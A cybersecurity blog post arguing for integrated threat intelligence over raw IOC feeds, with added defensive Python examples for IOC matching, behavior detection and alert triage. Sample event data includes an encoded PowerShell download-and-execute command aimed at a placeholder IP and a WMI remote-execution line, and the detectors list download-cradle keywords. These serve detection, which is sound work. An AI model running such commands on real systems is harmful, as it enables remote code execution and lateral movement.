Integrated Threat Intelligence – The New Enterprise “Must-Have”

2020-08-11 By SecureSteve

Remember when IT security was just a wish-list item in the corporate budget? Yeah, me neither. For a while, the checkbook was open for anything that promised a better security posture. These days, organizations are starting to mature around their stack: they are asking their existing tools to do more before they invest in something net new. Many organizations feel they don’t need “the best of everything”, but having poor security is a non-starter these days.

There are key foundational elements that most organizations have traditionally considered essential: firewalls, intrusion prevention systems, web and email filters, and endpoint protection are treated as critical to any security posture. (Ironically, some of these “network perimeter” solutions are beginning to change as the perimeter itself dissolves.) As organizations modernize, additional items such as advanced malware analysis tools (usually in the form of sandboxes), next-generation antivirus (using machine learning), and security information and event management (SIEM) for log collection and correlation have moved into the security foundation as well.

However, there is one additional item that is frequently discussed but rarely actually used in an environment: threat intelligence. In today’s landscape of endless alerts and dashboards, organizations are beginning to realize that useful threat intelligence is pivotal. It can reduce alert fatigue and allow organizations to align their security priorities around real, validated threats.

Understanding “real” Intelligence

Say that you need to drive to a destination you’ve never been to before. You have a couple of options for figuring out how to get there. You could, for example, ask a friend for directions. In cybersecurity terms, this is roughly analogous to obtaining some IOCs (more on this later).

Another option is to print a map. A map generally contains a lot more information; it might even give you some detail about the individual turns. This is starting to look more like threat intelligence.

Today, the ultimate option is GPS navigation. (Did you know that Google Maps is 15 years old already?) Within the common GPS app on your phone, you quickly get road conditions, traffic, speed traps or construction, alternate routes, estimated time of arrival, etc. All of this is live data, consumed with nearly zero effort (simply enter your destination, and a wealth of relevant data is automatically integrated into your driving). THIS is what truly integrated threat intelligence looks like.

To be fair, when everything is perfect, all three methods get you to your destination. Yet for organizations, how often is “everything just perfect”? What if someone at your destination asks you to stop at a grocery store along the way? What if you need to find a gas station? We know cybersecurity teams must be agile to handle constant industry change (and an ever-changing threat landscape). If you have to integrate IOC or threat feeds into your environment manually, or your tools can’t even consume that data, it is that much harder to understand key threat activity within your environment.

A caution around calling IOCs “intelligence”

Indicators of compromise (IOCs) are the form of threat information most organizations are familiar with. Many companies subscribe to ‘threat feeds’, real-time blocklists, and the like. IOCs themselves are typically artifacts such as file hashes, IP addresses, domains, process names, and URLs that were observed as a result of some bad activity that was captured.

The issue with this data is two-fold. First, assume you have ‘all of the bad IPs in the world’ and ‘all of the bad domains in the world’ in a list. How large do you think that list is? HUGE. At most organizations’ scale this becomes difficult to consume, manage, and keep current (an indicator from six months ago may now point at recycled hosting that has nothing to do with the original activity). Plus, it is artifact data.

This leads to the second problem. This data is reactive, essentially left-over data. Sergio Caltagirone, VP of threat intelligence at Dragos, likens IOCs to “car exhaust” in a YouTube clip: it is “what is left over after all of the bad activity has been done”. In that way, IOCs are similar to getting driving directions from a friend. It IS the route your friend took, which is potentially useful. Yet it’s far from dynamic, complete, or easy to use if anything even slightly changes: recompile the binary and the hash is new, move the command-and-control behind a new IP and the address is new, while the adversary’s behavior stays exactly the same.
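Consuming a feed is harder than it looks even before you get to the staleness problem: feeds deliver indicators defanged, mixed-case, with trailing dots and “hxxp” schemes, and none of that matches what a proxy or EDR sensor actually logs. The following is an added example written for this post (not the author’s code or any vendor’s): a small IOC store that normalizes feed entries, ages them out, and matches observations. The feed, the dates and the observations are constructed for illustration (documentation-reserved addresses and names, not real indicators).

```python
"""Added example, not code from the original post: a small IOC store that
normalizes feed entries, ages them out, and matches live observations.
The feed below is constructed for illustration; the values are
documentation-reserved addresses and names, not real indicators."""
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional, Tuple
import ipaddress
import re

# Constructed feed lines: type,value,first_seen. Values are written the way
# feeds actually deliver them: defanged, mixed case, trailing dots, hxxp.
SAMPLE_FEED = """\
ip,203.0.113[.]45,2020-07-30
domain,Evil-Updates[.]example.,2020-06-01
url,hxxps://Evil-Updates[.]example/dl/report.xlsm,2020-08-01
sha256,E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,2020-02-10
"""

def refang(value: str) -> str:
    """Undo common defanging so an indicator compares equal to what a sensor sees."""
    value = value.strip().replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)

def normalize(ioc_type: str, value: str) -> str:
    """Canonical form per type; the same value must normalize identically
    whether it came from the feed or from a proxy/EDR event."""
    value = refang(value)
    if ioc_type == "ip":
        return str(ipaddress.ip_address(value))        # also rejects garbage
    if ioc_type == "domain":
        return value.lower().rstrip(".")
    if ioc_type == "url":
        scheme, _, rest = value.partition("://")
        host, slash, path = rest.partition("/")
        return f"{scheme.lower()}://{host.lower()}{slash}{path}"  # path stays case-sensitive
    if ioc_type == "sha256":
        return value.lower()
    raise ValueError(f"unknown IOC type {ioc_type!r}")

class IocStore:
    """(type, value) -> first_seen. Entries older than max_age are treated as
    expired: artifact data goes stale, and an unbounded list ends up matching
    mostly recycled infrastructure."""

    def __init__(self, max_age: timedelta):
        self.max_age = max_age
        self._entries: Dict[Tuple[str, str], datetime] = {}

    def __len__(self) -> int:
        return len(self._entries)

    def load(self, feed_text: str) -> int:
        loaded = 0
        for line in feed_text.splitlines():
            if not line.strip():
                continue
            ioc_type, raw, first_seen = line.split(",", 2)
            key = (ioc_type, normalize(ioc_type, raw))
            seen = datetime.fromisoformat(first_seen).replace(tzinfo=timezone.utc)
            self._entries[key] = max(seen, self._entries.get(key, seen))  # keep newest sighting
            loaded += 1
        return loaded

    def match(self, ioc_type: str, observed: str, now: datetime) -> Optional[dict]:
        key = (ioc_type, normalize(ioc_type, observed))
        seen = self._entries.get(key)
        if seen is None:
            return None
        age = now - seen
        if age > self.max_age:
            return None          # expired: a hit here is noise, not a finding
        return {"type": ioc_type, "value": key[1], "age_days": age.days}

def demo() -> dict:
    """Load the constructed feed and check constructed observations as of 2020-08-11."""
    now = datetime(2020, 8, 11, tzinfo=timezone.utc)
    store = IocStore(max_age=timedelta(days=90))
    loaded = store.load(SAMPLE_FEED)
    return {
        "loaded": loaded,
        "domain": store.match("domain", "EVIL-UPDATES.EXAMPLE", now),   # case differs: still hits
        "ip": store.match("ip", "203.0.113.45", now),
        "url": store.match("url", "https://evil-updates.example/dl/report.xlsm", now),
        "old_hash": store.match("sha256",
                                "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
                                now),                                   # six months old: expired
        "unknown": store.match("domain", "updates.example", now),
    }

if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name:9} {hit}")
```

The 90-day expiry is an assumption, not a standard; the right value depends on the indicator type (hashes of a specific sample stay valid longer than an IP that a hosting provider will reassign). The point is that every match carries an age, so the analyst can see at a glance whether the “hit” is current exhaust or last year’s.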

Attribution is critical

Many organizations think about computer malware the same way they think about bacteria and viruses. That is, “I don’t care what it looks like, I don’t care how it got here. I just want to make sure I don’t get infected with it.” Just like today’s COVID-19 events, certain breach announcements may cause some behavior changes (washing hands, cleaning more often; watching antivirus updates more closely, scanning more often, etc.).

The issue with this perspective is that it assumes all malware and threat activity are created equal. We’ve known for years that there are different types of malware (trojans, worms, botnets, etc.) and different avenues of “infection” (phishing, removable media and other device connectivity, etc.). Yet if your antivirus solution shows that it blocked a file as “Packed.Win32.Generic”, what the heck are you supposed to do with that? A generic detection name tells you a packer was recognized, not who sent the file, what it was for, or whether anything else followed it.

As another example, say you’re about ready to leave the office for the weekend. All of a sudden, you get a few low-level alerts from your AV solution. Maybe those alerts show things were blocked. With your current tool set, can you tell the difference between some commodity malware and the beginning of a targeted campaign against your organization? Can you at least agree those are two different things? This is the type of attribution (and context) that threat intelligence should be providing.

Plus, not all breaches are due to malware

In 2019, 51% of the incidents that CrowdStrike (CRWD) responded to employed malware-less techniques at some point, and 29% of all incidents used no malware at all. Malware-less attacks can be performed with simple scripting, PowerShell, or WMI calls, using tools that are already present and signed on every Windows system, so there is no malicious file for a signature to fire on.

Also, say someone has obtained administrative credentials. They can then log into the environment with a valid password, exactly the way a real administrator would. How is an anti-malware solution supposed to handle that? Nothing about the file system is wrong; only the behavior (where, when and from what the account logged in, and what it did next) is out of place.
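Detecting any of this is a behavior problem, not a file problem. The following is an added example written for this post (not the author’s code or any product’s logic): three small detections for the techniques just mentioned, run over constructed Windows-style event records (simplified Sysmon/Security-log shapes). It decodes a PowerShell -EncodedCommand payload so the analyst sees the script rather than a base64 blob, flags both ends of a WMI remote process creation, and flags an administrator RDP logon that is wrong only by its source and time. The host and user names, the “adm_” naming convention and the jump-host allow-list are assumptions.

```python
"""Added example, not code from the original post: three detections for
"malware-less" activity, run over constructed Windows-style event records
(Sysmon/Security-log shaped, simplified). Host names, user names, the
admin naming convention and the jump-host allow-list are assumptions."""
import base64
import re
from datetime import datetime
from typing import List, Optional

def _enc(script: str) -> str:
    """Build a -EncodedCommand blob the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed events. "process" = process creation, "logon" = Security 4624-like.
EVENTS = [
    {"kind": "process", "time": "2020-08-07T17:42:10", "host": "WS-0417", "user": "jdoe",
     "parent": "EXCEL.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/a')")},
    {"kind": "process", "time": "2020-08-07T17:43:02", "host": "WS-0417", "user": "jdoe",
     "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": 'wmic /node:FS-01 /user:CORP\\svc_backup process call create "cmd /c whoami /groups"'},
    {"kind": "process", "time": "2020-08-07T17:43:05", "host": "FS-01", "user": "svc_backup",
     "parent": "WmiPrvSE.exe", "image": "cmd.exe", "cmdline": "cmd /c whoami /groups"},
    {"kind": "logon", "time": "2020-08-08T02:15:44", "host": "DC-01", "user": "CORP\\adm_rsmith",
     "logon_type": 10, "source": "WS-0417"},
    {"kind": "logon", "time": "2020-08-07T09:05:12", "host": "DC-01", "user": "CORP\\adm_rsmith",
     "logon_type": 10, "source": "JUMP-01"},
    {"kind": "process", "time": "2020-08-07T09:10:00", "host": "WS-0200", "user": "asmith",
     "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe Get-Date"},
]

ADMIN_JUMP_HOSTS = {"JUMP-01"}        # assumption: admins may only RDP from here
ADMIN_PREFIX = "adm_"                 # assumption: naming convention for admin accounts
BUSINESS_HOURS = range(7, 19)         # 07:00-18:59 local
# PowerShell accepts any unambiguous prefix of -EncodedCommand; attackers use the short ones.
ENCODED_FLAG = re.compile(r"\s-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                          re.IGNORECASE)
SUSPICIOUS_PS = re.compile(r"downloadstring|iex\b|invoke-expression|webclient|frombase64string",
                           re.IGNORECASE)
WMI_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "mshta.exe", "regsvr32.exe"}

def _finding(ev: dict, rule: str, severity: str, detail: str) -> dict:
    return {"rule": rule, "severity": severity, "host": ev["host"], "user": ev["user"],
            "time": ev["time"], "detail": detail}

def detect_encoded_powershell(ev: dict) -> Optional[dict]:
    """Decode -enc payloads; the decoded text is what an analyst needs, not the blob."""
    if ev["kind"] != "process" or ev["image"].lower() != "powershell.exe":
        return None
    m = ENCODED_FLAG.search(ev["cmdline"])
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace").strip()
    except ValueError:
        decoded = "<undecodable blob>"
    severity = "high" if SUSPICIOUS_PS.search(decoded) else "medium"
    return _finding(ev, "encoded_powershell", severity, decoded)

def detect_wmi_remote_exec(ev: dict) -> Optional[dict]:
    """Both ends of WMI lateral movement: the wmic caller and the WmiPrvSE child on the target."""
    if ev["kind"] != "process":
        return None
    cmd = ev["cmdline"].lower()
    if ev["image"].lower() == "wmic.exe" and "/node:" in cmd and "process call create" in cmd:
        return _finding(ev, "wmi_remote_exec", "high", "initiator: " + ev["cmdline"])
    if ev["parent"].lower() == "wmiprvse.exe" and ev["image"].lower() in WMI_CHILDREN:
        return _finding(ev, "wmi_remote_exec", "high", "target spawned " + ev["image"] + " via WMI")
    return None

def detect_valid_account_anomaly(ev: dict) -> Optional[dict]:
    """No malware to find: an admin logon is wrong only by where and when it happened."""
    if ev["kind"] != "logon" or ev.get("logon_type") != 10:      # 10 = RemoteInteractive (RDP)
        return None
    if not ev["user"].split("\\")[-1].startswith(ADMIN_PREFIX):
        return None
    reasons = []
    if ev["source"] not in ADMIN_JUMP_HOSTS:
        reasons.append(f"RDP from non-jump host {ev['source']}")
    if datetime.fromisoformat(ev["time"]).hour not in BUSINESS_HOURS:
        reasons.append("outside business hours")
    if not reasons:
        return None
    severity = "high" if len(reasons) > 1 else "medium"
    return _finding(ev, "valid_account_anomaly", severity, "; ".join(reasons))

DETECTORS = [detect_encoded_powershell, detect_wmi_remote_exec, detect_valid_account_anomaly]

def run_detections(events: List[dict]) -> List[dict]:
    """Apply every detector to every event, in event order."""
    findings = []
    for ev in events:
        for detect in DETECTORS:
            f = detect(ev)
            if f:
                findings.append(f)
    return findings

if __name__ == "__main__":
    for f in run_detections(EVENTS):
        print(f"[{f['severity']:6}] {f['time']} {f['host']:8} {f['rule']:22} {f['detail']}")
```

Notice that the plain `powershell.exe Get-Date` on WS-0200 and the 09:05 jump-host logon produce nothing: the detections key on how the tool was used, not on the tool itself, which is what keeps this from becoming another alert-fatigue source.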

What to look for in good Threat Intelligence

Good threat intelligence provides clues and maps of expected threat actor behavior. For example, say you knew that a threat actor typically attacks an environment with a targeted phishing email, that the email carries a link leading to a download of an Excel file with an embedded script, and that the script performs asset inventory and looks for administrative credentials. If you knew those behaviors occur in that order, it would be much easier to watch for that activity within your environment, and to know what should come next once you’ve seen the first few steps.

When this data is properly integrated, you immediately have a wealth of contextual information with which to understand your risk exposure. You can tell, at a glance, whether that “AV” alert you see on a Friday is a simple commodity attack or the start of a bigger campaign targeting your organization. (For the record, cyber criminals and threat actors know when holidays and normal business hours occur, and time their activity accordingly.)
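Here is what that ordered-behavior lookup looks like in code. This is an added example written for this post, not the author’s code or any product’s: it takes behavior observations that an EDR, mail gateway or AV would already produce, groups them per host, and matches them in order against an assumed actor profile modelled on the chain just described (phishing link, user opens the Excel file, embedded script, inventory, credential hunting). The actor name, the hosts and the observations are constructed; the ATT&CK technique IDs are used purely as behavior labels.

```python
"""Added example, not code from the original post: correlating behaviors
observed on a host against an actor's expected order of operations. The
actor profile, host names and observations are constructed; the ATT&CK IDs
are used only as behavior labels, the way an EDR or SIEM would tag events."""
from datetime import datetime, timedelta
from typing import Dict, List

# Assumed actor profile, modelled on the chain described in the post:
# phishing link -> user opens Excel -> embedded script -> inventory -> hunt for admin creds.
ACTOR_PROFILES = {
    "ACTOR-EXAMPLE": {
        "chain": ["T1566.002", "T1204.002", "T1059.005", "T1082", "T1552.001"],
        "window": timedelta(hours=48),   # steps must land within this span to count as one intrusion
    },
}
CAMPAIGN_THRESHOLD = 0.6   # fraction of the chain seen in order before we call it a campaign

def obs(time: str, host: str, tag: str, source: str) -> dict:
    return {"time": datetime.fromisoformat(time), "host": host, "tag": tag, "source": source}

# Constructed observations from three hosts on a Friday afternoon.
OBSERVATIONS = [
    obs("2020-08-07T16:50:00", "WS-0417", "T1566.002", "mail gateway: link click"),
    obs("2020-08-07T17:01:10", "WS-0417", "T1204.002", "EDR: EXCEL.EXE opened report.xlsm from Downloads"),
    obs("2020-08-07T17:02:30", "WS-0417", "T1059.005", "EDR: EXCEL.EXE -> wscript.exe"),
    obs("2020-08-07T17:05:00", "WS-0417", "T1082",     "EDR: systeminfo, net group \"Domain Admins\""),
    obs("2020-08-07T17:41:00", "WS-0417", "AV:Packed.Win32.Generic", "AV: blocked stage-2 dropper"),
    obs("2020-08-07T17:30:00", "WS-0200", "AV:Packed.Win32.Generic", "AV: blocked adware bundle"),
    obs("2020-08-07T10:00:00", "WS-0300", "T1082",     "EDR: systeminfo (helpdesk inventory script)"),
]

def match_chain(events: List[dict], chain: List[str], window: timedelta) -> List[dict]:
    """Greedy in-order subsequence match: walk the host's events by time and
    advance through the chain whenever the next expected step appears. Gaps
    between steps are allowed; the whole match must fit inside `window`."""
    matched: List[dict] = []
    idx = 0
    start = None
    for ev in sorted(events, key=lambda e: e["time"]):
        if start is not None and ev["time"] - start > window:
            break
        if idx < len(chain) and ev["tag"] == chain[idx]:
            if start is None:
                start = ev["time"]
            matched.append(ev)
            idx += 1
    return matched

def assess_hosts(observations: List[dict], profiles: Dict[str, dict]) -> Dict[str, dict]:
    """Per host: the best-matching actor, which steps were seen, what should come
    next, and a verdict an analyst can act on at 5pm on a Friday."""
    by_host: Dict[str, List[dict]] = {}
    for ev in observations:
        by_host.setdefault(ev["host"], []).append(ev)
    results = {}
    for host, events in by_host.items():
        best = {"host": host, "actor": None, "matched": [], "coverage": 0.0, "verdict": "commodity"}
        for actor, profile in profiles.items():
            hits = match_chain(events, profile["chain"], profile["window"])
            coverage = len(hits) / len(profile["chain"])
            if coverage > best["coverage"]:
                best.update(actor=actor, matched=[h["tag"] for h in hits], coverage=coverage)
        if best["coverage"] >= CAMPAIGN_THRESHOLD:
            best["verdict"] = "campaign"
            best["next_expected"] = profiles[best["actor"]]["chain"][len(best["matched"]):]
        results[host] = best
    return results

if __name__ == "__main__":
    for host, r in assess_hosts(OBSERVATIONS, ACTOR_PROFILES).items():
        print(host, r["verdict"], r["actor"], r["matched"], r.get("next_expected", []))
```

The same “Packed.Win32.Generic” block appears on WS-0417 and WS-0200, and the output is different for each: on WS-0417 it follows four steps of the actor’s chain (verdict “campaign”, next expected step T1552.001, credential hunting), on WS-0200 it follows nothing. The matcher deliberately requires the chain’s first step before it counts anything, so the helpdesk inventory script on WS-0300 stays “commodity”; a production correlator would usually also allow a match to start mid-chain, at the cost of more noise.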

Additionally, good threat intelligence should be tailorable. You should be able to see intelligence as it pertains to your industry vertical, company size, geographic location, the countries you operate in, the platforms you use, your customer base, etc. The more relevant this data is, the better you’re able to orient limited resources.

How can organizations integrate and utilize threat intelligence?

(In the heading above, I initially typed “operationalize” instead of “integrate and utilize”. However, I hate those industry buzzwords, and every time I use one I die a little more inside. OK, back to it…)

First, there are dedicated Threat Intelligence Platforms (TIPs). These solutions usually enable some integration out of the box, with larger integrations typically available via customization and service engagements. TIPs consolidate all sources of threat intelligence into a single location and deliver actionable data for security analysts to pursue. A TIP coupled with a SOAR solution helps overcome the scaling issues a TIP has by itself, because the enrichment and response steps can run without an analyst in the loop for every alert.

A Security Orchestration, Automation and Response (SOAR) solution, when coupled with a quality Security Information and Event Management (SIEM) solution and an endpoint detection and response (EDR) solution, allows security teams to automate queries and actions across the environment based on threat alerts and events. The fidelity of the data fed into this system becomes critical: automation built on stale or low-confidence indicators will isolate or block the wrong things at machine speed.

Ultimately, however, organizations should demand higher quality threat intelligence directly within the workflow of their security tools. Within just a few clicks, security analysts should be able to understand their organization’s security posture against any threat actor or behavior, and identify the devices that may be susceptible to those threats. Again, this should be available in a click or two, or automatically. Having a link to a threat report or blog article is not sufficient in today’s fast-paced environments.
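To make the “in the workflow” demand concrete, and to show the tailoring discussed above (vertical, geography, platforms) doing real work, here is an added example written for this post, not the author’s code or any TIP/SOAR vendor’s. It is the triage step a playbook would run on an AV alert: look the sample up in a local intelligence store, score the actor’s known targeting against this organization’s profile, query the asset inventory for the devices exposed to the actor’s entry technique, and return a decision. The intelligence record, the hash, the organization profile, the inventory and the exposure rules are all constructed assumptions.

```python
"""Added example, not code from the original post: the triage step of an
alert playbook with threat intelligence in the loop. The TI record, the
sample hash, the organization profile, the inventory and the exposure
predicates are constructed assumptions, not real data."""
from typing import Callable, Dict, List

# Constructed TI store keyed by sample hash. A real TIP exposes the same kind
# of fields (actor, targeting, platforms, delivery technique) through its API.
SAMPLE_HASH = "0123456789abcdef" * 4          # constructed, not a real sample
TI_STORE = {
    SAMPLE_HASH: {
        "actor": "ACTOR-EXAMPLE",
        "family": "stage-2 dropper (generic AV name: Packed.Win32.Generic)",
        "targets": {"sectors": {"healthcare", "finance"}, "regions": {"US", "DE"}},
        "platforms": {"windows"},
        "delivery": "office_macro",            # entry technique this sample depends on
        "confidence": 0.85,
    },
}

# Assumed profile of "our" organization: what the tailoring is matched against.
ORG_PROFILE = {"sector": "healthcare", "regions": {"US", "UK"}, "platforms": {"windows", "macos"}}

# Constructed asset inventory, the kind of data a CMDB or EDR console already holds.
INVENTORY = [
    {"host": "WS-0417", "platform": "windows", "region": "US", "macros_enabled": True,  "edr": False},
    {"host": "WS-0200", "platform": "windows", "region": "US", "macros_enabled": False, "edr": True},
    {"host": "WS-0300", "platform": "windows", "region": "UK", "macros_enabled": True,  "edr": True},
    {"host": "MB-0010", "platform": "macos",   "region": "US", "macros_enabled": True,  "edr": True},
]

# Assumed exposure predicates: which hosts could a given delivery technique land on?
EXPOSURE: Dict[str, Callable[[dict], bool]] = {
    "office_macro": lambda h: h["platform"] == "windows" and h["macros_enabled"],
    "rdp_bruteforce": lambda h: h.get("rdp_exposed", False),
}

def relevance(ti: dict, org: dict) -> int:
    """0..100 points for how much this actor's known targeting overlaps with us.
    Integer points avoid floating-point surprises when comparing to a threshold."""
    points = 0
    if org["sector"] in ti["targets"]["sectors"]:
        points += 40
    if org["regions"] & ti["targets"]["regions"]:
        points += 30
    if org["platforms"] & ti["platforms"]:
        points += 30
    return points

def exposed_hosts(ti: dict, inventory: List[dict]) -> List[str]:
    """Devices susceptible to the actor's entry technique, least protected first."""
    pred = EXPOSURE.get(ti["delivery"])
    if pred is None:
        return []
    hits = [h for h in inventory if pred(h)]
    return [h["host"] for h in sorted(hits, key=lambda h: (h["edr"], h["host"]))]

def triage(alert: dict, ti_store: dict = TI_STORE, org: dict = ORG_PROFILE,
           inventory: List[dict] = INVENTORY) -> dict:
    """One alert in, one decision out, with the context an analyst would otherwise
    have to assemble by hand from a threat report."""
    result = {"host": alert["host"], "detection": alert["detection"]}
    ti = ti_store.get(alert["sha256"])
    if ti is None:
        result.update(decision="no_intel",
                      action="close as commodity unless EDR shows follow-on activity")
        return result
    score = relevance(ti, org)
    exposed = exposed_hosts(ti, inventory)
    result.update(actor=ti["actor"], family=ti["family"], relevance=score,
                  confidence=ti["confidence"], exposed=exposed)
    if score >= 60 and ti["confidence"] >= 0.7 and exposed:
        others = [h for h in exposed if h != alert["host"]]
        result.update(decision="campaign",
                      action=f"isolate {alert['host']}; hunt " + ", ".join(others))
    else:
        result.update(decision="low_relevance",
                      action="block hash, confirm macro policy; no hunt required")
    return result

SAMPLE_ALERT = {"host": "WS-0417", "sha256": SAMPLE_HASH, "detection": "Packed.Win32.Generic"}

if __name__ == "__main__":
    print(triage(SAMPLE_ALERT))
    print(triage(SAMPLE_ALERT, org={"sector": "retail", "regions": {"BR"}, "platforms": {"windows"}}))
    print(triage({"host": "WS-0200", "sha256": "f" * 64, "detection": "Packed.Win32.Generic"}))
```

Run against the healthcare profile, the Friday alert comes back as a campaign with WS-0300 named as the next host to hunt on (macros enabled, same entry technique). The identical alert against a retail organization in Brazil scores 30 points and is closed as low relevance: same sample, same detection name, different answer, which is exactly what tailored intelligence is supposed to buy you. The point thresholds are assumptions to be tuned, not recommendations.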

And now, this…

Biggest data breaches of the 21st century:
https://www.csoonline.com/article/2130877/the-biggest-data-breaches-of-the-21st-century.html

2019 Data Breach Hall of Shame
https://www.cnet.com/news/2019-data-breach-hall-of-shame-these-were-the-biggest-data-breaches-of-the-year/

InformationIsBeautiful – Largest Data Breaches
https://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

#StayVigilant
#StaySafe
#LookOutForEachOther